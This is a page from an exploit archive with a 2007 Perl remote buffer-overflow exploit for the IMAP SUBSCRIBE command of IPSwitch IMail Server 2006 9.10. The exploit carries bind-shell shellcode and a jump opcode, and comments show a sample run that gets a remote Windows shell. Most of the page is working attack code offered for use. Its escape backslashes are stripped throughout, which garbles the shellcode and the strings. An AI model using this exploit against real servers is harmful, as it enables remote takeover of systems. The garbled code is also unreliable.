[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit
# Published : 2007-07-26
# Author : ZhenHan.Liu
# Previous Title : Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit
# Next Title : Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Delete File Exploit
#!/use/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (Answered Flagged Deleted Seen Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?
#D:Microsoft Visual Studio 8VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168.1.2] 22 (?) open
#Microsoft Windows [.. 5.2.3790]
#(C) .... 1985-2003 Microsoft Corp.
#C:WINDOWSsystem32>net user
#net user
#\ .....
#-------------------------------------------------------------------------------
#Administrator ASPNET Guest
#IUSR_WIN2K3 IWAM_WIN2K3 SUPPORT_388945a0
#..................
#C:WINDOWSsystem32>
use strict;
use warnings;
use IO::Socket;
if( @ARGV != 3 )
{
my $banner = qq{
Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1
You must have a account to login the imap server, good luck!
Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~
imail_subscribe.pl <host> <username> <password>
};
print $banner."n";
exit( -1 );
}
my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
# win32_bind - EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x41".
"xd1xfdxbcx83xebxfcxe2xf4xbdxbbx16xf1xa9x28x02x43".
"xbexb1x76xd0x65xf5x76xf9x7dx5ax81xb9x39xd0x12x37".
"x0exc9x76xe3x61xd0x16xf5xcaxe5x76xbdxafxe0x3dx25".
"xedx55x3dxc8x46x10x37xb1x40x13x16x48x7ax85xd9x94".
"x34x34x76xe3x65xd0x16xdaxcaxddxb6x37x1excdxfcx57".
"x42xfdx76x35x2dxf5xe1xddx82xe0x26xd8xcax92xcdx37".
"x01xddx76xccx5dx7cx76xfcx49x8fx95x32x0fxdfx11xec".
"xbex07x9bxefx27xb9xcex8ex29xa6x8ex8ex1ex85x02x6c".
"x29x1ax10x40x7ax81x02x6ax1ex58x18xdaxc0x3cxf5xbe".
"x14xbbxffx43x91xb9x24xb5xb4x7cxaax43x97x82xaexef".
"x12x82xbexefx02x82x02x6cx27xb9xfdxaax27x82x74x5d".
"xd4xb9x59xa6x31x16xaax43x97xbbxedxedx14x2ex2dxd4".
"xe5x7cxd3x55x16x2ex2bxefx14x2ex2dxd4xa4x98x7bxf5".
"x16x2ex2bxecx15x85xa8x43x91x42x95x5bx38x17x84xeb".
"xbex07xa8x43x91xb7x97xd8x27xb9x9exd1xc8x34x97xec".
"x18xf8x31x35xa6xbbxb9x35xa3xe0x3dx4fxebx2fxbfx91".
"xbfx93xd1x2fxccxabxc5x17xeax7ax95xcexbfx62xebx43".
"x34x95x02x6ax1ax86xafxedx10x80x97xbdx10x80xa8xed".
"xbex01x95x11x98xd4x33xefxbex07x97x43xbexe6x02x6c".
"xcax86x01x3fx85xb5x02x6ax13x2ex2dxd4xaex1fx1dxdc".
"x12x2ex2bx43x91xd1xfdxbc";
my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.n";
my $res = <$sock>;
print $res;
if( $res !~ /OK/ )
{
exit( -1 );
}
my $opcode = "x60x1Ax9Cx76";
#my $opcode = "x61x62x63x64";
my $num = 264991;
my $nop = "#IMAILPUB" . "x90" x ( $num - length($shellcode) ).$shellcode."x90x90xebx06".$opcode."x90x90x90x90"."xE9x44xfdxffxff"."x90" x 400;
# login
print $sock "0 LOGIN $user $passrn";
$res = <$sock>;
if( ! defined($res) )
{
exit(-1);
}
print $res;
if( $res !~ /OK/ )
{
exit(-1);
}
print $sock "2 SELECT INBOXrn";
while( <$sock> )
{
print $_;
if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ )
{
last;
}
}
print $sock "3 SUBSCRIBE "$nop"rn";
$res = <$sock>;
if( ! defined($res) )
{
exit(-1);
}
print $res;
print "Trying..n";
sleep( 15 );
print "Bingle! Maybe get it!nYou can try to telnet 22 port, do you have nc?n";
print $sock "4 LOGOUTrn";
print <$sock>;
$sock->close();
# www.Syue.com [2007-07-26]